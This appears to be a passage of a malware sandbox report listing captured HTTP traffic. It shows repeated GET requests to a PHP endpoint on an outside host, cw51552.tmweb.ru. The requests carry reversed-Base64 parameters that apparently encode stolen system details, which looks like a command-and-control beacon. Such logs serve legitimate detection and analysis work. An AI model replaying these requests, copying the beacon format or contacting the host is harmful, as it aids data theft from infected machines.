Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru

Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&f06dddd6da1af50c4d2046ad80cd0bd3=7406d4e040947858aca2d8984e05343c&ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23 HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&c1867ab1f3ddc7e3f363557f83cd2055=538f85528a6efd277c2f8b4d2790cd41&c01989751a368db0cb0d8cfc3a15fd41=QZiZGNwE2YhdjZ2cjYzcTMkRTZkFDO5UjNzUDO2gjZkJmMyE2MzAzN&ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23 HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&b7f0a4918b7f29e95f6b0984ebfb745a=%00&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=AZwI2NiVDMyQWZ0AjZzAjZ2IjYiRTOihzMmZDOmJmMhdTNiRGNxMzM HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&1a31b0c70a151fd4aad95e235079a27e=0nIzNXZulGZhVmUwBXQcx1c39GZul2VcxlODJiOigGdhBlIsIiMucjL0IiOi42bpNnclZ1ay92dl1WYyZkIsIib39mbr5WViojIoRXYQ1WYydWZsVGViwiIiojIzBHcB1WYlR3UiwiIud3butmbVJiOiQUSyV2cV1WYlR3UiwiIud3butmbVJiOiIXZzVVbhVGdTJCLi42dv52auVlI6IyZuFGTtFWZ0NlIsIib39mbr5WViojIoRXYQ1WYlR3UiwiIuxlccRzNzITLmhDN4gjYjZ2eu0HMwADMwADMw4SMuAjLwsnI6Iycl52boB3byNWaNJCLi4GXyxVMZFETQNVSExFXuwFXcxlI6IycuVWZyN2UiwiIiojIz1WYjJWZXJCL0kDM0ojINFkUiwiIl52bONzQ1YjUy8kVadlI6ICZyF2biJXZoR3bNJCLiE0Lc5kI6ICbsF2dlJXaGJCLiIXZk5WZmVGRgM3dvRmbpdlI6Iyc1JXa2lGduFkIsISLiojIQlkTBxkIsISTaREVYJiOiM1TJJkIsIieIdEIwQjLyACQgADM2YDIVB1QgITKNRFKlJ3bDBSKShCblRnbJJiOiUWbh5UVQNkIsISQvwlTiojIl1WYOVFUHJye&4fc5eac600fca7de5bfd7671e592aee5=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&690546cdb8ccca9224141f65d5311620=AZwI2NiVDMyQWZ0AjZzAjZ2IjYiRTOihzMmZDOmJmMhdTNiRGNxMzM HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
